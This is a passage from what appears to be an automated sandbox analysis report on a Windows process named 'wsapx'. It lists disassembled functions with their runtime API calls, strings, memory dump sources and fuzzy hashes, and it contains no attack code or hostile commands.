Instruction ID: cdc31f79a3e3ce94d7c88b641a50ca3592822a37dfa2a2d7e826e24d0bca9e52
Opcode Fuzzy Hash: 8a81c8cbb4aa2b9f2a700104a6053669787526fe1ac8cdbb7c926e4a602ee9f8
Instruction Fuzzy Hash: E8815823B082E589E371DEA5A0A05F93A91E712791F45853AEFC94B3C2DA3CD987D350

Function 00007FF7C71CFC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71CFF17

Part of subcall function 00007FF7C71C7AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C7AC9

Strings

UTF-8, xrefs: 00007FF7C71CFE96
ccs, xrefs: 00007FF7C71CFE52
UTF-16LEUNICODE, xrefs: 00007FF7C71CFEB5

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: 83d486029c2d1cb82f270f4f28fc2789f2d4ab47bdb8e388e269bc910bf1185d
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: AE81A433E0824287F7646EA5A11027CB7A8AB91F64FD68035DA0997299DF2DE9039361

Function 00007FFD94621FD0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

00007FFDB2246570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD94622008
00007FFDB2246570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD94622026

Strings

CJK UNIFIED IDEOGRAPH-, xrefs: 00007FFD9462201C
HANGUL SYLLABLE , xrefs: 00007FFD94621FF5

Memory Dump Source

Source File: 00000002.00000002.2668800317.00007FFD94621000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFD94620000, based on PE: true

Associated: 00000002.00000002.2668762753.00007FFD94620000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD94682000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD946CE000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD946D2000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD946D7000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD9472F000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD94734000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD94737000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2669246979.00007FFD94738000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2669284338.00007FFD9473A000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94620000_wsapx.jbxd

Similarity

API ID: 00007B2246570
String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
API String ID: 511975427-87138338
Opcode ID: d800521c55394c3ad25b6a38125f6762d0e11982fd6218b3e6ef33505340922b
Instruction ID: c1520902867a64b84de5893841fde55cc8bb6ecf53eb3b912e98cdbc4ffa60d5
Opcode Fuzzy Hash: d800521c55394c3ad25b6a38125f6762d0e11982fd6218b3e6ef33505340922b
Instruction Fuzzy Hash: 0F6128B2B1864256E6708B95A8946FA7252FB82B90F44C235EF79C7BC6DF3CE501C700

Function 00007FF7C71BD6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7C71BD6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7C71BD77A
RtlUnwindEx.KERNEL32 ref: 00007FF7C71BD7D4

Strings

csm, xrefs: 00007FF7C71BD761

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: 84f239a1754c7d21c042ef0a012b966b119375654e5d72b2eea359f60de99f95
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: C4519072B296028BDB18AF15F446A78B791EB84FA8F904174DE8E47748DF3DE842C710

Function 00007FF7C71BEF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF7C71BEFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF7C71BEFF3

Strings

MOC, xrefs: 00007FF7C71BEFBB
RCC, xrefs: 00007FF7C71BEFC3

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: 69018d22b3a797c0cf694384062b908ce680bd29574af46cd00a29181fac4f13
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: 00619EB2908B8582EB20AF25F4403AAB7A4FBC5BA4F444625EF9C03B55CF7CD195CB10

Function 00007FF7C71BF2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7C71BF320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF7C71BF408

Strings

csm, xrefs: 00007FF7C71BF45A
csm, xrefs: 00007FF7C71BF342

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: 8bad83fd77456f50d4f3da069cbbc2363f3e3353a36a0c3803c1607745fba7b1
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: 0A51D3B290824287EB64AF25E084768B7A8FB94FA4F944135EE4C43BD5CF3CE552C710

Function 00007FFD94759360 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 140COMMON

Download Yara Rule

APIs

00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD94759488

Strings

%s at line %d of [%.10s], xrefs: 00007FFD9475955E
database corruption, xrefs: 00007FFD94759552
831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0, xrefs: 00007FFD94759545

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID: 00007C0619
String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
API String ID: 3344901894-3764764234
Opcode ID: 8f983514268cc7df1290e166eec0b47a294775388fb5c19de4c52b4ac99553b0
Instruction ID: f54d01d4fd1aad717c257df1cff23a8350cd815259da673f181a6cdf33e7a991
Opcode Fuzzy Hash: 8f983514268cc7df1290e166eec0b47a294775388fb5c19de4c52b4ac99553b0
Instruction Fuzzy Hash: B7519F72708B85C6EB64CBA5D1906BA73A4FB49B84F548036DF4D47796EF38E852C380

Function 00007FFD9475B160 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113COMMON

Download Yara Rule

APIs

00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD9475B236

Strings

%s at line %d of [%.10s], xrefs: 00007FFD9475B2E9
database corruption, xrefs: 00007FFD9475B2DD
831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0, xrefs: 00007FFD9475B2D0

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID: 00007C0619
String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
API String ID: 3344901894-3764764234
Opcode ID: fa40007d604dc6cc06400549b7ec3b66cbe8079a186df2d3bd517a7d904fd4b9
Instruction ID: 1a02f8664eb89a707819b0e5c5943112423ec6c4b42c19df9e7c5a176ee8284a
Opcode Fuzzy Hash: fa40007d604dc6cc06400549b7ec3b66cbe8079a186df2d3bd517a7d904fd4b9
Instruction Fuzzy Hash: A941B032B18649C2E7609F95E4A02BD73A5FB85B90F548135EA4D5B795DF3CD802C780

Function 00007FF7C71B7E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF7C71B352C,?,00000000,00007FF7C71B3F23), ref: 00007FF7C71B7F22

Strings

%.*s, xrefs: 00007FF7C71B7EDB
%s%c, xrefs: 00007FF7C71B7E94
\, xrefs: 00007FF7C71B7E87

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
Instruction ID: a680becc744ef84d055fc3f8fae95bd78d6e72bb96fe345c70c495ba6aad656d
Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
Instruction Fuzzy Hash: 0631B671719AC146EA21AF21B4517AAA364EFC4FF4F841231EE6D477C9DE3CE6068710

Function 00007FF7C71B2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF7C71B28EA

Strings

[PYI-%d:%ls] , xrefs: 00007FF7C71B2868
ERROR, xrefs: 00007FF7C71B286F
Error, xrefs: 00007FF7C71B28DD

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: aa86f1ea5dde1402545276de8a72f20fc2fdc1a5200d271e25c32b4b22ae7f82
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: 7121B172B18B4182E721AF54F4857AAA3A4EBC8B94F804131EE8D93655DF3CD24AC750

Function 00007FF7C71CC610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF7C71CC68F
WriteFile.KERNEL32 ref: 00007FF7C71CC957
WriteFile.KERNEL32 ref: 00007FF7C71CC99D
GetLastError.KERNEL32 ref: 00007FF7C71CCA53

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: 3aab948ca4d1a9e257958ae2f900f2c4ce8a77f9a8670dd7eb98b303ac255d78
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction Fuzzy Hash: 25D12772B18A408BE711DFA9E4401AC7771FB94FA8B848235DE5E57B89DE38D407C750

Function 00007FF7C71CCFD0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C71CCFBB), ref: 00007FF7C71CD0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C71CCFBB), ref: 00007FF7C71CD177

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: a26d259292c1d742ca6ba35c1b661ed6d895888781958de7865a86e3ed6bf798
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: 8091D872F2866197F750AFB5A44127DABA0BB84FA8F944139DE4E57A84CE38D443C720

Function 00007FF7C71CF9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7C71CFAEC
_get_daylight.LIBCMT ref: 00007FF7C71CFAFD
_get_daylight.LIBCMT ref: 00007FF7C71CFB0E
_isindst.LIBCMT ref: 00007FF7C71CFBD9

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: f0f180b177008c89fbe897a43bbf8e0c92963cfc214eed1589d3289e0cb8adaa
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: 01512973F081118BFB14EFA4A9957BCA7A9AB90B78F904135ED1D52AE4DF38A503C710

Function 00007FF7C71C57EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF7C71C581F
GetFileInformationByHandle.KERNEL32 ref: 00007FF7C71C5881
GetLastError.KERNEL32 ref: 00007FF7C71C5912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C71C5724), ref: 00007FF7C71C595E

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction ID: 173772bec6df521791b11e27a7a1971f633386cf7eccb5fbabc1a03cd5548fa8
Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction Fuzzy Hash: 3D516222E086418BFB10EFB1E4503BDABB1AB88FA8F644575DE4D57689DF38D542C720

Function 00007FF7C71B20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF7C71B20F4
SetWindowLongPtrW.USER32 ref: 00007FF7C71B2116
GetWindowLongPtrW.USER32 ref: 00007FF7C71B2140
InvalidateRect.USER32 ref: 00007FF7C71B2160

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: e79bda630bed4a44c07d468e4c644bff8772ac87388b32baf1dfbe61957b0a38
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: BB11A971B1C14243F655AF69F9882B99291EBD9FA0FC4C030DF4A07B99CD2DD5968610

Function 00007FF7C71BD080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7C71BD0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF7C71BD0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF7C71BD0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF7C71BD0D6

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: a06605fad0fb532140a1d7121615bf9b8aa18f496d392976e0b8397aaceec27c
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: 7B114F36B14B058BEB00DF60F8452A973A4FB59B68F440E35DA5D46764DF3CD1598350

Function 00007FFD9477E200 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD9477E40D

Strings

out of memory, xrefs: 00007FFD9477FFBB
too many levels of trigger recursion, xrefs: 00007FFD9477FD3D

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID: 00007C0619
String ID: out of memory$too many levels of trigger recursion
API String ID: 3344901894-3387558265
Opcode ID: 2da8eabf17ebf59af3b23f36f8cc1f2aacf79c3bff37746ddbcefc3f1bc563b6
Instruction ID: 5db8916641739661cdd3d782156b67bc14fc1483994f0dbefa5a8c18e584d148
Opcode Fuzzy Hash: 2da8eabf17ebf59af3b23f36f8cc1f2aacf79c3bff37746ddbcefc3f1bc563b6
Instruction Fuzzy Hash: 5D816976B05B45C6DB20CF49E494A6977E8FB4A784B468436DF8D83B61DF78E081C780

Function 00007FF7C71D5B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C71D17D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D1803

_get_daylight.LIBCMT ref: 00007FF7C71D5CA4
_get_daylight.LIBCMT ref: 00007FF7C71D5CB5

Strings

?, xrefs: 00007FF7C71D5C35

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

